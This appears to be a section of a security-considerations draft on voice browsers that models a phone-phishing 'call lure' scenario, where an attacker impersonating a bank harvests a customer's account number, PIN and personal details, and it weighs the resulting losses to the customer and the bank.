5.2 Call Lure

Alice is a customer of BobBank. Mallet is an attacker attempting to obtain Alice's access credential for the BobBank site by impersonating BobBank via the phone.

Mallet places an outbound call to Alice (and a hundres of other users). The phone number appears to be from a legitimate 800-number service. The voice service introduces itself as BobBank and alerts Alice that for fraud verification purposes, they need to ask her a series of questions. The call also says "For verification purposes, please enter your account number and numeric pin." For further verification, Mallet asks Alice to state her mother's maiden name. Finally, the system asks some non-identifying information such as "Is your checkbook in your possession?", "Please state the date of your last ATM transaction?", "Please enter the amount of your last ATM transaction?". The call concludes by saying "Thank you, your account appears to be in good standing at this time. Goodbye."

Mallet also provides an 800 number at the beginning of the transaction that can be used to call back when it is convenient. That 800 number is managed by Mallet and answers asking the same transactions.

Alice and BobBank both have assets at risk. Alice's personal information has been compromised and her account may also be compromised at this point. In addition to direct losses due to fraud BobBank may suffer indirect losses due to the need to reissue account numbers, pins, and checkbooks to Alice and increased customer service calls whether or not the attack is successful: Alice may insist on doing all her future transactions at a local branch at significantly higher cost to the bank. Alice may contact customer service to ask about the attack.

For additional references, see http://www.cknow.com/news/security/PhoneSpoofingAddedtoPhish.html

X.X Unique Characteristics of Voice Browsers



[1] VoiceXML 2.0 Standard Session Variables /TR/voicexml20/#dml5.1.4